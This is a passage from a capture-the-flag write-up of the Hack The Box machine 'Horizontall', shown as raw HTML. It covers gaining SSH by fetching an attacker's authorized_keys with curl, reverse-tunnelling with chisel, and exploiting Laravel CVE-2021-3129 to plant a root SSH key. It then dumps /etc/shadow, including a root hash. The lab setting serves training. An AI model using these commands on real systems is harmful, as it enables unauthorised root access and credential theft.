class="SemanticString__Fragment SemanticString__Fragment--Code">$> curl --create-dirs -o ~/.ssh/authorized_keys http://10.10.14.45:8000/authorized_keys</code></span></span></p></div><div id="https://www.notion.so/db68a160292c4008b977729fe86d1b9b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can then simply SSH in as the Strapi user:</span></span></p></div><div id="https://www.notion.so/a603da292e4c4d7baf2f6ab400fdcf6e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh strapi@horizontall.htb</code></span></span></p></div><div id="https://www.notion.so/b905041790584200a325635d3949173d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">And we’ve gained a shell. Though, the default </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/sh</code></span><span class="SemanticString"> shell isn’t the most interactive shell. We can upgrade it by simply running </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/bash</code></span><span class="SemanticString"> on the victim machine:</span></span></p></div><div id="https://www.notion.so/56c137e790744cea9f771eecbeda0d17" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ bash</code></span></span></p></div><div id="https://www.notion.so/b90b369672494ac8bcab7086ac0c10d1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looking at the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/home</code></span><span class="SemanticString"> directory, we spot a “developer” user. Let’s see if we can read their files:</span></span></p></div><div id="https://www.notion.so/edcb4299aef24527902f3f675343bb86" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la /home/developer</code></span></span></p></div><pre id="https://www.notion.so/c0b75451216447539009d941e8a2ffdf" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>total 108
drwxr-xr-x 8 developer developer 4096 Aug 2 12:07 .
drwxr-xr-x 3 root root 4096 May 25 2021 ..
lrwxrwxrwx 1 root root 9 Aug 2 12:05 .bash_history -> /dev/null
-rw-r----- 1 developer developer 242 Jun 1 2021 .bash_logout
-rw-r----- 1 developer developer 3810 Jun 1 2021 .bashrc
drwx------ 3 developer developer 4096 May 26 2021 .cache
-rw-rw---- 1 developer developer 58460 May 26 2021 composer-setup.php
drwx------ 5 developer developer 4096 Jun 1 2021 .config
drwx------ 3 developer developer 4096 May 25 2021 .gnupg
drwxrwx--- 3 developer developer 4096 May 25 2021 .local
drwx------ 12 developer developer 4096 May 26 2021 myproject
-rw-r----- 1 developer developer 807 Apr 4 2018 .profile
drwxrwx--- 2 developer developer 4096 Jun 4 2021 .ssh
-r--r--r-- 1 developer developer 33 Jan 15 08:37 user.txt
lrwxrwxrwx 1 root root 9 Aug 2 12:07 .viminfo -> /dev/null</span></span></span></code></pre><div id="https://www.notion.so/264b8753830846698f9ebb0b4c17f629" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can read the user flag!</span></span></p></div><div id="https://www.notion.so/f63decb9840d4edd8c9601d7ab48b582" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /home/developer/user.txt</code></span></span></p></div><h2 id="https://www.notion.so/4c04d1076ac24864b5ddea598c05ec72" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/4c04d1076ac24864b5ddea598c05ec72"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><div id="https://www.notion.so/98af7ff15e024c99a8a741d2c0ee6f4d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Enumerating for other services</strong></span></span></p></div><div id="https://www.notion.so/bda3500ba37f4b4987045296030e8458" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">While enumerating for common info on the machine, I found a few more services running that are only accessible from the internal network:</span></span></p></div><div id="https://www.notion.so/a3cd94d95d5d4e13af0acd1860d2063c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ netstat -tulnp</code></span></span></p></div><pre id="https://www.notion.so/211e728fa4ab4ff2bd101c4bffc3bb15" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1614/node /usr/bin/
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -</span></span></span></code></pre><div id="https://www.notion.so/4fa5a739eae145bc99edfc54c0096ff3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We have already discovered ports 22 (SSH), 80 (HTTP) in our external scan. If we make a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">curl</code></span><span class="SemanticString"> connection to port 1337 with something like:</span></span></p></div><div id="https://www.notion.so/c17a785a8e6d4ca5b28361054f1da22e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl 127.0.0.1:1337</code></span></span></p></div><div id="https://www.notion.so/e2d3347de18e44ed9dcfbf989ec9339f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We see that it is running the Strapi CMS that we just exploited. So, this leaves only port 3306 and 8000. We know that port 3306 is usually reserved for MySQL databases, so let’s check out port 8000 first, as it could suggest another web application running on the machine.</span></span></p></div><div id="https://www.notion.so/00b4e208020846598d16c37fcc789e1e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Connecting to port 8000 with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">curl</code></span><span class="SemanticString"> again, there seem to be a web server running Laravel. We can use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">chisel</code></span><span class="SemanticString">, a fast </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/jpillora/chisel">TCP/UDP tunnel over HTTP</a></span><span class="SemanticString">, to forward port 8000 on the victim’s machine to our local attacker machine through a reverse tunnel and investigate it further. First, let’s set up a server listening (on a port other than 8000) for the victim’s reverse connection:</span></span></p></div><div id="https://www.notion.so/4d1cd1bb66934cfd913a69b0e76a6bf7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./chisel server -p 9001 --reverse</code></span></span></p></div><div id="https://www.notion.so/7706994ce0e74799bd46e6f05d5990cb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, on the victim’s machine, we upload the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">chisel</code></span><span class="SemanticString"> binary using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">scp</code></span><span class="SemanticString"> as we already have SSH access:</span></span></p></div><div id="https://www.notion.so/be79f19461c44e92afcd302672348cb2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ scp ./chisel strapi@horizontall.htb:/dev/shm</code></span></span></p></div><div id="https://www.notion.so/3eafed3021884148bae6402729f78d1e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Finally, to forward the connection locally, we run </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">chisel</code></span><span class="SemanticString"> in client mode to connect to our server:</span></span></p></div><div id="https://www.notion.so/b7f3bd81148d418c89af9753aaa2e1f0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./chisel client 10.10.14.45:9001 R:8000:127.0.0.1:8000</code></span></span></p></div><div id="https://www.notion.so/9ab35a41c93347cd9f93802eb50cc5d6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Note that as the Laravel site shares the same port as our HTTP server (8000), we will need to shutdown our HTTP server first.</span></span></p></div><div id="https://www.notion.so/7f7affeae14647828396b53fa18563d5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can then check out the site by visiting </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">127.0.0.1:8000</code></span><span class="SemanticString"> in our browser:</span></span></p></div><div id="https://www.notion.so/12b2dcfdd8fc4dac936f9c299bbc544e" class="Image Image--Normal"><figure><a href="https://i.imgur.com/IcKsm10.png?width=1008"><img src="https://i.imgur.com/IcKsm10.png?width=1008" style="width:1008px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/c51efdb9279e4ed6b2207f1b32a4a4b4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Exploiting Laravel with CVE-2021-3129</strong></span></span></p></div><div id="https://www.notion.so/9e471d64b62343feb1cc5dbcb8f8c2f8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It seems like the site is running an outdated version of Laravel, and may be vulnerable to RCE if debug mode were to be enabled (</span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129">CVE-2021-3129</a></span><span class="SemanticString">). One way of verifying this is by seeing if an error exception causes a suggested “solution” to be generated, which can look something like this:</span></span></p></div><div id="https://www.notion.so/9bae7a158db8446cab80fbe5455a78ff" class="Image Image--Normal"><figure><a href="https://i.imgur.com/pU9iYEY.png?width=1008"><img src="https://i.imgur.com/pU9iYEY.png?width=1008" style="width:1008px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/bee9e3457f834de3b534c5a2659aa169" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This vulnerability is well documented and mainly stems from the insecure use of </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">file_get_content()</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">file_put_contents()</code></span><span class="SemanticString"> calls in the Ignition error page module, particularly in its “Solutions” feature that suggests fixes to errors. We can use this </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/nth347/CVE-2021-3129_exploit">exploit written by nth347</a></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/c092969dd6ae48c383f648b7acc76ef6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./exploit.py http://127.0.0.1:8000 Monolog/RCE1 "whoami && id"</code></span></span></p></div><pre id="https://www.notion.so/aa9b62eefad84eafa0e69e3e12650b43" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited
root
uid=0(root) gid=0(root) groups=0(root)
[i] Trying to clear logs
[+] Logs cleared</span></span></span></code></pre><div id="https://www.notion.so/b04bde88345e4429a81cd4b1dbe51287" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looks like this application is running on the machine as root! Let’s gain access by once again copying our SSH public key to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">~/.ssh/authorized_keys</code></span><span class="SemanticString"> file. We begin by starting up our HTTP server, this time on a different port since 8000 is already taken:</span></span></p></div><div id="https://www.notion.so/1f06220465b24161985d066a8cb63603" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cd ./www && python -m http.server 7000</code></span></span></p></div><div id="https://www.notion.so/a2065929834c439384b62239797a7225" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Now, using the same exploit:</span></span></p></div><div id="https://www.notion.so/a0033d8ffb704bdb804213454f8d6efa" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./exploit.py http://127.0.0.1:8000 Monolog/RCE1 "curl --create-dirs -o /root/.ssh/authorized_keys http://10.10.14.45:7000/authorized_keys"</code></span></span></p></div><div id="https://www.notion.so/dc14d57d3ad24a2dadd9fae5f2a1bde9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can then simply SSH into the machine as root:</span></span></p></div><div id="https://www.notion.so/e754984338d345cabf2e49052d2a0a5c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh root@horizontall.htb</code></span></span></p></div><div id="https://www.notion.so/8c0aef223d26410da1bdaa5649cf9198" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Let’s get the root flag!</span></span></p></div><div id="https://www.notion.so/180cbd62258348589c073e53db5967ba" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat root.txt</code></span></span></p></div><h2 id="https://www.notion.so/2d7161329dc347788603ac5c7945ed51" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/2d7161329dc347788603ac5c7945ed51"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><div id="https://www.notion.so/00c7cf35360740579021655bb7f89429" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can get the root user's password hash from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/shadow</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/1632c9ac87e049898bb5056691b2e423" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /etc/shadow</code></span></span></p></div><pre id="https://www.notion.so/497d9b1607634aa0b741120d5e82322d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root:$6$rGxQBZV9$SbzCXDzp1MEx7xxXYuV5voXCy4k9OdyCDbyJcWuETBujfMrpfVtTXjbx82bTNlPK6Ayg8SqKMYgVlYukVOKJz1:18836:0:99999:7:::</span></span></span></code></pre><div id="https://www.notion.so/474223ec7a0344edb97e1130f1809c38" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Let’s clean up after ourselves and delete any residual files:</span></span></p></div><div id="https://www.notion.so/aac6676e038e4cfca920b0dc3282ada7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ rm /dev/shm/chisel</code></span></span></p></div><h2 id="https://www.notion.so/5b49741e4f754515bcdf6af871639abc" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/5b49741e4f754515bcdf6af871639abc"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/41ea446da6c5497ebaf51ac1e96fb699" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString">Gobuster usage tutorial - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/">https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/</a></span></span><div id="https://www.notion.so/07412859b7bd4cac81dabbcf426834b3" class="Bookmark"><a href="https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/"><h5 class="Bookmark__Title">Gobuster for directory, DNS and virtual hosts bruteforcing</h5><p class="Bookmark__Desc">Tue 17 Mar 2020 In this article we are going to explore a "busting" tool called Gobuster. It is a really active project with many followers, which means that we get to see improvements and fixes for bugs often and ofcourse new features are being added as time passes by.</p><p class="Bookmark__Link">https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/</p></a></div></li><li id="https://www.notion.so/c91a665736994857952dee774f029530" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString">Technical analysis of CVE-2019-19609 - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://bittherapy.net/post/strapi-framework-remote-code-execution/">https://bittherapy.net/post/strapi-framework-remote-code-execution/</a></span></span><div id="https://www.notion.so/18c592563433489e9495271e84abd235" class="Bookmark"><a href="https://bittherapy.net/post/strapi-framework-remote-code-execution/"><h5 class="Bookmark__Title">Strapi Framework Vulnerable to Remote Code Execution (CVE-2019-19609)</h5><p class="Bookmark__Desc">CVE: CVE-2019-19609 Vendor: Strapi (https://strapi.io) Product: Strapi Framework Version Affected: strapi-3.0.0-beta.17.7 and earlier Fix PR: https://github.com/strapi/strapi/pull/4636 NPM Advisory: https://www.npmjs.com/advisories/1424 Description: &ldquo;Manage your content. Distribute it anywhere. The open source Headless CMS Front-End Developers love.&rdquo; Recently I came across a cool &ldquo;headless&rdquo; CMS called Strapi which makes creating dynamic sites painless.</p><p class="Bookmark__Link">https://bittherapy.net/post/strapi-framework-remote-code-execution/</p></a></div></li><li id="https://www.notion.so/3fab57849b6548ceb5491bcf27340644" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString">Tunneling with Chisel - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html">https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html</a></span></span><div id="https://www.notion.so/277ed79fd362470f95cb433688d4a98f" class="Bookmark"><a href="https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html"><h5 class="Bookmark__Title">Tunneling with Chisel and SSF</h5><p class="Bookmark__Desc">Update 2020-08-10] Chisel now has a built in SOCKS proxy! I also added a cheat sheet since I reference this post too often. [Original] Having just written up HTB Reddish, pivoting without SSH was at the top of my mind, and I've since learned of two programs that enable pivots, Chisel and Secure Socket Funneling (SSF).</p><p class="Bookmark__Link">https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html</p></a></div></li><li id="https://www.notion.so/15b4a1fa00564ae8be823a58591202c1" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString">Laravel debug mode RCE (CVE-2021-3129) - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.ambionics.io/blog/laravel-debug-rce">https://www.ambionics.io/blog/laravel-debug-rce</a></span></span><div id="https://www.notion.so/0e9d2501283d4e79b5cc34211433d7c1" class="Bookmark"><a href="https://www.ambionics.io/blog/laravel-debug-rce"><h5 class="Bookmark__Title">Laravel <= v8.4.2 debug mode: Remote code execution</h5><p class="Bookmark__Desc">In late November of 2020, during a security audit for one of our clients, we came accross a website based on Laravel. While the site's security state was pretty good, we remarked that it was running in debug mode, thus displaying verbose error messages including stack traces: Upon further inspection, we discovered that these stack traces were generated by Ignition, which were the default Laravel error page generator starting at version 6.</p><p class="Bookmark__Link">https://www.ambionics.io/blog/laravel-debug-rce</p></a></div></li></ol></article>
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>